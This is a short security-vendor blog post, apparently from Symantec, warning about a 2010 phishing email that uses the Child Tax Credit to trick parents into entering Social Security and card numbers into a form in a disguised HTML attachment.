Who wouldn’t want some tax benefits in the current economic times? Don’t phishers and scammers know that all too well! In a new phishing scheme, Symantec has found that Child Tax Credit is being used as bait to lure parents to disclose their financial data. This attack specifically tries to convince users to make claims for credit and lower their tax burden by using their children’s education expenses.
According to the Internal Revenue Service (IRS) website [PDF], taxpayers may be able to reduce their federal income tax by up to $1,000 for each qualifying child. Making use of this information, spam email discusses the expensive education of children and quickly advises recipients to use this expense to make claims for tax credits under the numerous tax benefits provided by the IRS. They make a further appeal that as a U.S. citizen or resident, recipients should apply for their tax returns. According to the email, users can get a tax refund of $75,000 for their children’s education. To apply for a refund, users need to complete a form attached to the email message. The fraudulent email has an HTML attachment named “#1924819299.pdf.htm”.
Once the recipient clicks on the attachment, an HTML file will open that asks users to fill in data such as social security numbers, credit/debit card numbers, and related information. Unfortunately, this information is for the fraudsters to use once the user clicks the “submit” button.
Using an HTML attachment in phishing attacks is a well-known technique. There are constant variations seen in the headers and contents of these messages designed to confuse users. This time the scammers have found a new theme and a new potential target: parents. However, we are continually watching these types of attacks, particularly for any minor variations. This is more so because the deadline for filing individual tax returns (April 15, 2010) is not far away, and it won’t be surprising if there are similar spam campaigns seen during the next one to two weeks.
Scammers may further attempt to use the huge list of tax benefits as lures to trick users. Symantec advises users to apply standard practices of not opening attachments and/or links from unsolicited emails.